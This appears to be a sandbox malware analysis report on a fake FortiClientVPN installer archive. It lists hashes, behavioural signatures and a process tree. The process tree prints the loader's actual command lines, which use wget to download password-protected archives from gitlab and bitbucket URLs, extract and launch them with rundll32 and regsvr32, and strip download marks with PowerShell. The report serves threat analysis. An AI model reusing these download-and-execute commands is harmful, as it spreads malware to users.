Analysis
-
max time kernel
167s -
max time network
134s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
16/12/2022, 16:07
Static task
static1
Behavioral task
behavioral1
Sample
FortiClientVPN-10_11.zip
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
FortiClientVPN-10_11.zip
Resource
win10v2004-20220812-en
General
-
Target
FortiClientVPN-10_11.zip
-
Size
115.0MB
-
MD5
fee389057573b6496b3c2bdcd69102be
-
SHA1
a344e37e1045c780cad9681818056820980cd716
-
SHA256
8e1226ecf81fb863a95dfea31603172473ed8a5d301f185927732e4ae0066814
-
SHA512
a44afb6140e1d084616b54f40d21142d8b4f2fb82dedc9ab1e4a2a0fc18f18c1a05a167806b7a66a50c958d71cd207efd6551ce73535b07867ad927103b198be
-
SSDEEP
3145728:TNAOLDyOLNXhcrZOLmKiOL7OLUOLDOLjOLdOLW:TNfvir/KC
Malware Config
Signatures
-
Executes dropped EXE 4 IoCs
pid Process 1888 wget.exe 1568 winrar.exe 1228 winrar.exe 1504 winrar.exe -
Loads dropped DLL 3 IoCs
pid Process 1116 FortiClientVPN.exe 1116 FortiClientVPN.exe 1116 FortiClientVPN.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 4 IoCs
pid Process 108 timeout.exe 1980 timeout.exe 1056 timeout.exe 1072 timeout.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 544 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: 33 580 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 580 AUDIODG.EXE Token: 33 580 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 580 AUDIODG.EXE Token: SeDebugPrivilege 544 powershell.exe -
Suspicious use of WriteProcessMemory 59 IoCs
description pid Process procid_target PID 1116 wrote to memory of 1924 1116 FortiClientVPN.exe 38 PID 1116 wrote to memory of 1924 1116 FortiClientVPN.exe 38 PID 1116 wrote to memory of 1924 1116 FortiClientVPN.exe 38 PID 1116 wrote to memory of 1924 1116 FortiClientVPN.exe 38 PID 1924 wrote to memory of 1980 1924 cmd.exe 40 PID 1924 wrote to memory of 1980 1924 cmd.exe 40 PID 1924 wrote to memory of 1980 1924 cmd.exe 40 PID 1924 wrote to memory of 1980 1924 cmd.exe 40 PID 1116 wrote to memory of 1712 1116 FortiClientVPN.exe 41 PID 1116 wrote to memory of 1712 1116 FortiClientVPN.exe 41 PID 1116 wrote to memory of 1712 1116 FortiClientVPN.exe 41 PID 1116 wrote to memory of 1712 1116 FortiClientVPN.exe 41 PID 1712 wrote to memory of 1056 1712 cmd.exe 43 PID 1712 wrote to memory of 1056 1712 cmd.exe 43 PID 1712 wrote to memory of 1056 1712 cmd.exe 43 PID 1712 wrote to memory of 1056 1712 cmd.exe 43 PID 1116 wrote to memory of 544 1116 FortiClientVPN.exe 44 PID 1116 wrote to memory of 544 1116 FortiClientVPN.exe 44 PID 1116 wrote to memory of 544 1116 FortiClientVPN.exe 44 PID 1116 wrote to memory of 544 1116 FortiClientVPN.exe 44 PID 1116 wrote to memory of 1888 1116 FortiClientVPN.exe 46 PID 1116 wrote to memory of 1888 1116 FortiClientVPN.exe 46 PID 1116 wrote to memory of 1888 1116 FortiClientVPN.exe 46 PID 1116 wrote to memory of 1888 1116 FortiClientVPN.exe 46 PID 1116 wrote to memory of 1568 1116 FortiClientVPN.exe 48 PID 1116 wrote to memory of 1568 1116 FortiClientVPN.exe 48 PID 1116 wrote to memory of 1568 1116 FortiClientVPN.exe 48 PID 1116 wrote to memory of 1568 1116 FortiClientVPN.exe 48 PID 1116 wrote to memory of 1228 1116 FortiClientVPN.exe 49 PID 1116 wrote to memory of 1228 1116 FortiClientVPN.exe 49 PID 1116 wrote to memory of 1228 1116 FortiClientVPN.exe 49 PID 1116 wrote to memory of 1228 1116 FortiClientVPN.exe 49 PID 1116 wrote to memory of 1504 1116 FortiClientVPN.exe 50 PID 1116 wrote to memory of 1504 1116 FortiClientVPN.exe 50 PID 1116 wrote to memory of 1504 1116 FortiClientVPN.exe 50 PID 1116 wrote to memory of 1504 1116 FortiClientVPN.exe 50 PID 1116 wrote to memory of 620 1116 FortiClientVPN.exe 51 PID 1116 wrote to memory of 620 1116 FortiClientVPN.exe 51 PID 1116 wrote to memory of 620 1116 FortiClientVPN.exe 51 PID 1116 wrote to memory of 620 1116 FortiClientVPN.exe 51 PID 620 wrote to memory of 1072 620 cmd.exe 53 PID 620 wrote to memory of 1072 620 cmd.exe 53 PID 620 wrote to memory of 1072 620 cmd.exe 53 PID 620 wrote to memory of 1072 620 cmd.exe 53 PID 620 wrote to memory of 1580 620 cmd.exe 54 PID 620 wrote to memory of 1580 620 cmd.exe 54 PID 620 wrote to memory of 1580 620 cmd.exe 54 PID 620 wrote to memory of 1580 620 cmd.exe 54 PID 620 wrote to memory of 1580 620 cmd.exe 54 PID 620 wrote to memory of 1580 620 cmd.exe 54 PID 620 wrote to memory of 1580 620 cmd.exe 54 PID 620 wrote to memory of 108 620 cmd.exe 55 PID 620 wrote to memory of 108 620 cmd.exe 55 PID 620 wrote to memory of 108 620 cmd.exe 55 PID 620 wrote to memory of 108 620 cmd.exe 55 PID 1712 wrote to memory of 324 1712 cmd.exe 56 PID 1712 wrote to memory of 324 1712 cmd.exe 56 PID 1712 wrote to memory of 324 1712 cmd.exe 56 PID 1712 wrote to memory of 324 1712 cmd.exe 56
Processes
-
C:\Windows\Explorer.exeC:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\FortiClientVPN-10_11.zip1⤵PID:1380
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:1224
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x54c1⤵
- Suspicious use of AdjustPrivilegeToken
PID:580
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\FortiClientVPN-10_11.zip"1⤵PID:1652
-
C:\Users\Admin\AppData\Local\Temp\7zO476A1A0D\FortiClientVPN.exe"C:\Users\Admin\AppData\Local\Temp\7zO476A1A0D\FortiClientVPN.exe"2⤵PID:1176
-
-
C:\Users\Admin\Desktop\FortiClientVPN.exe"C:\Users\Admin\Desktop\FortiClientVPN.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /K >nul timeout /t 300 /nobreak & start /wait /min C:\Users\Admin\AppData\Roaming\DirectX\wget.exe -q --no-check-certificate "https://gitlab.com/michal63roberts63/soft/-/raw/main/DirectXbin.rar" -P C:\Users\Admin\AppData\Roaming\DirectX & >nul timeout /t 8 /nobreak & start /wait /min C:\Users\Admin\AppData\Roaming\DirectX\7z.exe x -y C:\Users\Admin\AppData\Roaming\DirectX\DirectXbin.rar -p2022 -oC:\Users\Admin\AppData\Roaming\DirectX & >nul timeout /t 5 /nobreak & start /wait /min C:\Users\Admin\AppData\Roaming\DirectX\7z.exe x -y C:\Users\Admin\AppData\Roaming\DirectX\DirectX32.rar -p2022 -oC:\Users\Admin\AppData\Roaming\DirectX & >nul timeout /t 5 /nobreak & start /min C:\Users\Admin\AppData\Roaming\DirectX\DirectX32.exe & >nul timeout /t 5 /nobreak & start /wait /min C:\Users\Admin\AppData\Roaming\DirectX\7z.exe x -y C:\Users\Admin\AppData\Roaming\DirectX\DirectX64.rar -p2022 -oC:\Users\Admin\AppData\Roaming\DirectX & >nul timeout /t 10 /nobreak & start /min rundll32 C:\Users\Admin\AppData\Roaming\DirectX\DirectX.dll DirectX & EXIT2⤵
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Windows\SysWOW64\timeout.exetimeout /t 300 /nobreak3⤵
- Delays execution with timeout.exe
PID:1980
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /K >nul timeout /t 90 /nobreak & start .\data\AppInfo\setup.exe & EXIT2⤵
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Windows\SysWOW64\timeout.exetimeout /t 90 /nobreak3⤵
- Delays execution with timeout.exe
PID:1056
-
-
C:\Users\Admin\Desktop\data\AppInfo\setup.exe.\data\AppInfo\setup.exe3⤵PID:324
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" get-childitem C:\Users\Admin\AppData\Roaming\DirectX | unblock-file2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:544
-
-
C:\Users\Admin\AppData\Roaming\DirectX\wget.exe"C:\Users\Admin\AppData\Roaming\DirectX\wget.exe" ping https://bitbucket.org/soft-here/soft/downloads/DirectXbin.rar -P C:\Users\Admin\AppData\Roaming2⤵
- Executes dropped EXE
PID:1888
-
-
C:\Users\Admin\AppData\Roaming\DirectX\winrar.exe"C:\Users\Admin\AppData\Roaming\DirectX\winrar.exe" x -y -p2022 C:\Users\Admin\AppData\Roaming\DirectXbin.rar C:\Users\Admin\AppData\Roaming2⤵
- Executes dropped EXE
PID:1568
-
-
C:\Users\Admin\AppData\Roaming\DirectX\winrar.exe"C:\Users\Admin\AppData\Roaming\DirectX\winrar.exe" x -y -p2022 C:\Users\Admin\AppData\Roaming\DirectX.rar C:\Users\Admin\AppData\Roaming2⤵
- Executes dropped EXE
PID:1228
-
-
C:\Users\Admin\AppData\Roaming\DirectX\winrar.exe"C:\Users\Admin\AppData\Roaming\DirectX\winrar.exe" x -y -p2022 C:\Users\Admin\AppData\Roaming\DirectX64.rar C:\Users\Admin\AppData\Roaming2⤵
- Executes dropped EXE
PID:1504
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /K >nul timeout /t 7 /nobreak & regsvr32 /s C:\Users\Admin\AppData\Roaming\DirectX.dll & >nul timeout /t 5 /nobreak & EXIT2⤵
- Suspicious use of WriteProcessMemory
PID:620 -
C:\Windows\SysWOW64\timeout.exetimeout /t 7 /nobreak3⤵
- Delays execution with timeout.exe
PID:1072
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Roaming\DirectX.dll3⤵PID:1580
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:108
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.1MB
MD5f59f4f7bea12dd7c8d44f0a717c21c8e
SHA117629ccb3bd555b72a4432876145707613100b3e
SHA256f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4
SHA51244811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c
-
Filesize
2.1MB
MD5f59f4f7bea12dd7c8d44f0a717c21c8e
SHA117629ccb3bd555b72a4432876145707613100b3e
SHA256f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4
SHA51244811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c
-
Filesize
2.1MB
MD5f59f4f7bea12dd7c8d44f0a717c21c8e
SHA117629ccb3bd555b72a4432876145707613100b3e
SHA256f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4
SHA51244811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c
-
Filesize
4.9MB
MD58c04808e4ba12cb793cf661fbbf6c2a0
SHA1bdfdb50c5f251628c332042f85e8dd8cf5f650e3
SHA256a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272
SHA5129619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f
-
Filesize
12B
MD56ae6991da8cd865bad3784053ab9319c
SHA1d38f9c2552d929684c6c8ab85f3b0db95157ee13
SHA256c34d82a75118f5b5c9719df9b8a9ce7d83b945c60ee0157b650e504e17d664bf
SHA51223c8a32767c27693dc7417d5292fb09235c7c65bafda672c017c75a47fafcbaad1ffe5ff1bfc22e8d05c5bb40477ede1a07849e20a296931e5a2cff379903f16
-
Filesize
2.1MB
MD5f59f4f7bea12dd7c8d44f0a717c21c8e
SHA117629ccb3bd555b72a4432876145707613100b3e
SHA256f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4
SHA51244811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c
-
Filesize
4.9MB
MD58c04808e4ba12cb793cf661fbbf6c2a0
SHA1bdfdb50c5f251628c332042f85e8dd8cf5f650e3
SHA256a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272
SHA5129619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f
-
Filesize
4.9MB
MD58c04808e4ba12cb793cf661fbbf6c2a0
SHA1bdfdb50c5f251628c332042f85e8dd8cf5f650e3
SHA256a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272
SHA5129619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f